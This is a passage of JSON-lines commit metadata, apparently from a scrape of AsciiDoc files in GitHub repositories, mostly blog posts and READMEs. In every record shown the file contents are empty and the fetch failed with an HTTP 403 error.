2015-07-07-Netrunner.adoc","repos":"nullbase\/nullbase.github.io,nullbase\/nullbase.github.io,nullbase\/nullbase.github.io","old_file":"_posts\/2015-07-07-Netrunner.adoc","new_file":"_posts\/2015-07-07-Netrunner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nullbase\/nullbase.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4d06e977cc3ec2ad2eae55313bbeb4e949622cf","subject":"Update 2016-06-21-Generator.adoc","message":"Update 2016-06-21-Generator.adoc","repos":"YvonneZhang\/yvonnezhang.github.io","old_file":"_posts\/2016-06-21-Generator.adoc","new_file":"_posts\/2016-06-21-Generator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YvonneZhang\/yvonnezhang.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4e45364af323196e4c7e5877ad7ccfc9a8e9f91","subject":"Update 2017-04-08-Tea-Break.adoc","message":"Update 2017-04-08-Tea-Break.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-08-Tea-Break.adoc","new_file":"_posts\/2017-04-08-Tea-Break.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8f686331d0489aa9c795537410d1d0e45a884ba","subject":"Update 2018-04-29-Hub-Press.adoc","message":"Update 2018-04-29-Hub-Press.adoc","repos":"hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io","old_file":"_posts\/2018-04-29-Hub-Press.adoc","new_file":"_posts\/2018-04-29-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hytgbn\/hytgbn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"132f34175dc308415b56f155747e5b5e7490999f","subject":"Create README.adoc for router","message":"Create README.adoc for router","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/example_gateway\/REAME.adoc","new_file":"examples\/example_gateway\/REAME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72249aa68edfd894327652af91234a38da58ec98","subject":"Update 2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","message":"Update 2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","repos":"sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io","old_file":"_posts\/2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","new_file":"_posts\/2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfoubert\/sfoubert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35e981837a8942b74a7d64c51c5b54168e1a138c","subject":"#435 DSL Build Git commit","message":"#435 DSL Build Git commit\n","repos":"flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack,flesire\/ontrack,nemerosa\/ontrack,nemerosa\/ontrack,nemerosa\/ontrack,flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack","old_file":"ontrack-dsl\/src\/main\/resources\/net.nemerosa.ontrack.dsl.properties.BuildProperties\/gitCommit.adoc","new_file":"ontrack-dsl\/src\/main\/resources\/net.nemerosa.ontrack.dsl.properties.BuildProperties\/gitCommit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flesire\/ontrack.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ee0ddf28cc5624c600ba8d520a16c11bb60926","subject":"Update 2015-11-10-Blog-Title.adoc","message":"Update 2015-11-10-Blog-Title.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2015-11-10-Blog-Title.adoc","new_file":"_posts\/2015-11-10-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad7cee09360b93dbac1e4723b0a38c212dccedaa","subject":"Update 2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","message":"Update 2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","new_file":"_posts\/2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c89ba081e530608a604e406ca1d9c5ede4a9754","subject":"Update 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","message":"Update 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_file":"_posts\/2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7466fe64ef7f222342a313dca28847529c7ee6e","subject":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","message":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ebc8e3b6d764b7febf8e8ba40eba0c82ae4b002","subject":"Add ClojuTRE 2019","message":"Add ClojuTRE 2019\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojutre.adoc","new_file":"content\/events\/2019\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"86e821acb1c7537fc476ed4b4ee67db75569a8d7","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojured.adoc","new_file":"content\/events\/2020\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8639429d5751cfc00519332beed497c0ab096179","subject":"Renamed '_posts\/2016-10-17-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc' to '_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc'","message":"Renamed '_posts\/2016-10-17-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc' to '_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc'","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc","new_file":"_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38004b4cfe7bbf227488a5e813c9c9f277c6c6f2","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/dutchclojureday.adoc","new_file":"content\/events\/2022\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"493d4cdda4f5e844fcab9c637d83f9d7c6e69c98","subject":"Update 2015-09-24-AS-kuaijj.adoc","message":"Update 2015-09-24-AS-kuaijj.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-24-AS-kuaijj.adoc","new_file":"_posts\/2015-09-24-AS-kuaijj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"accc827b81d58333c515494735c0b529ceb60010","subject":"Update 2015-10-04-Impressum.adoc","message":"Update 2015-10-04-Impressum.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-10-04-Impressum.adoc","new_file":"_posts\/2015-10-04-Impressum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woehrl01\/woehrl01.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62ebd4b11b06f149f533c6561db16bd7b5350c78","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f100722bffad4e6b44aee220731b709e32f509e5","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ff8749e109cb6606e4b6e5ca81a615d4bea0e7b","subject":"job: #11981 Introduce analysis note of requirements tag population and rendering.","message":"job: #11981 Introduce analysis note of requirements tag population and rendering.\n","repos":"lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc","old_file":"doc\/notes\/11444_wasl\/11981_reqs_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11981_reqs_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de86c1b27bbe0b025b2641e6a0934c5c6df83b62","subject":"Update Yubikey_and_SSH_via_PAM.adoc","message":"Update Yubikey_and_SSH_via_PAM.adoc","repos":"eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam","old_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7a1d69cc7c223bdb3329ab9c72762bfb58df6ebb","subject":"Update 2016-02-26-Ganttnam-Style.adoc","message":"Update 2016-02-26-Ganttnam-Style.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Ganttnam-Style.adoc","new_file":"_posts\/2016-02-26-Ganttnam-Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee1c77abbba1a4882108e7b87983a302dd834a0c","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bfd5099f17667f6984a5e638f68f0673ea42eae","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdae15329a8b49f4df42e3e7b68119e4730ec9f1","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0d89674e28013fa52fe8c701fd4d449cf3dec5b","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d49f644d2eb454882c377e0fd7ce75aa9cda784","subject":"fix #20 - update readme","message":"fix #20 - update readme\n","repos":"cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cescoffier\/vertx-forge-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3502f59c3bfebcdfb5567ec29052e1c937e6cb87","subject":"y2b create post LG G4 Unboxing \\u0026 Giveaway","message":"y2b create post LG G4 Unboxing \\u0026 Giveaway","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-06-LG-G4-Unboxing-u0026-Giveaway.adoc","new_file":"_posts\/2015-05-06-LG-G4-Unboxing-u0026-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8c8980d3156a8ba42890cf40c15d192d0689ded","subject":"Update 2018-07-04-flexing.adoc","message":"Update 2018-07-04-flexing.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-04-flexing.adoc","new_file":"_posts\/2018-07-04-flexing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1cc36c3464c4e0edf674fe60cbeb6fc07048b4e","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"InsertKoinIO\/koin,Ekito\/koin,InsertKoinIO\/koin,InsertKoinIO\/koin,Ekito\/koin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ekito\/koin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b64412814592da0203ab22978117253dc48a893","subject":"docs: add information about the apiman distros","message":"docs: add information about the apiman distros","repos":"msavy\/apiman,apiman\/apiman,apiman\/apiman,apiman\/apiman,msavy\/apiman,apiman\/apiman,msavy\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman","old_file":"distro\/README.adoc","new_file":"distro\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8daefdd5d7f841fded15cf979da03a8d4397ffbe","subject":"Add Sina Samavati","message":"Add Sina Samavati\n","repos":"the-concurrent-schemer\/scm,bsmr-erlang\/scm,the-concurrent-schemer\/scm,bsmr-erlang\/scm","old_file":"THANKS.asciidoc","new_file":"THANKS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsmr-erlang\/scm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdd1b53cbb8b2a0a8c55ceae736b7b2fd4b45771","subject":"Problem: executing emerald-rs throws a \"cannot bind to socket error\"","message":"Problem: executing emerald-rs throws a \"cannot bind to socket error\"\n\nSolution: point parity to a different port\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2d51d4ec66a3e7969552242e8afb3c1f71a76b1","subject":"Http basic authentication support added for boot-mon server.","message":"Http basic authentication support added for boot-mon server.\n","repos":"iyzico\/boot-mon,iyzico\/boot-mon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iyzico\/boot-mon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42234074f082b9d67b9215f61a79e3b52230698c","subject":"Replace obsolete gradle plugin link","message":"Replace obsolete gradle plugin link\n\nThe gradle plugin link is not working anymore. The new link refers to a plugin I've created.","repos":"cthiebaud\/jaxrs-analyzer,sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6df4a5c6754671a03c6d250f9d939a4e161ad3b4","subject":"read me","message":"read me\n","repos":"tomdkt\/Stream,tomdkt\/Stream,tomdkt\/Stream","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomdkt\/Stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"531f4754cb4ae2451c1250aec0fbd6a5446a04c0","subject":"Update 2015-03-22-Hallo-Welt.adoc","message":"Update 2015-03-22-Hallo-Welt.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woehrl01\/woehrl01.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d1adb4fbdacbd9f5d0a3f9a79231e18265197c","subject":"Update 2016-12-02-Cloudfiy-rabbitmq.adoc","message":"Update 2016-12-02-Cloudfiy-rabbitmq.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"_posts\/2016-12-02-Cloudfiy-rabbitmq.adoc","new_file":"_posts\/2016-12-02-Cloudfiy-rabbitmq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d68f018ce4defb722016093919322157ec7baeda","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"juxt\/tick,juxt\/tick","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ee508ee1bae26f6b6a82e172a19537e044323c2","subject":"Fix #397 (#398)","message":"Fix #397 (#398)\n\n* Fix #397\r\n\r\nadd adoc with system properties\r\n\r\n* Fix #397\r\n\r\nadd more details to system properties table\r\nalphabetise system properties\r\n\r\n* Fix #397\r\n\r\nedit getBoolean","repos":"OpenHFT\/Chronicle-Core","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c880eb32368dae003f8ad213a511640dcdfd3df8","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"093c924a028800703bc4bc3b071f6bd94e59c465","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae69c0505eed0ce10aa58af338ed20f8037243e4","subject":"Update 2015-05-04-Markdown-App.adoc","message":"Update 2015-05-04-Markdown-App.adoc","repos":"niole\/niole.github.io,niole\/niole.github.io,niole\/niole.github.io","old_file":"_posts\/2015-05-04-Markdown-App.adoc","new_file":"_posts\/2015-05-04-Markdown-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/niole\/niole.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4f39c6d7d5b7b4d6c6ff700e7d3faf4371c8f72","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e05712de9a9d245cd437eb7fa57189dd5319fce9","subject":"Update 2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","message":"Update 2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","new_file":"_posts\/2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dec1817844f1e882f154aa25f43e4c90903e3498","subject":"Cancel maven plugin setup","message":"Cancel maven plugin setup\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30fababf4c5ee0c57264de43cc50342a282a8eda","subject":"TAMAYA-194: Added Refreshable interface, updated docs.","message":"TAMAYA-194: Added Refreshable interface, updated docs.\n","repos":"apache\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya","old_file":"src\/site\/asciidoc\/extensions\/mod_mutable_config.adoc","new_file":"src\/site\/asciidoc\/extensions\/mod_mutable_config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"352010b627c507ff72b002e450a18eff1e4644d1","subject":"blog: cheating n queens","message":"blog: cheating n 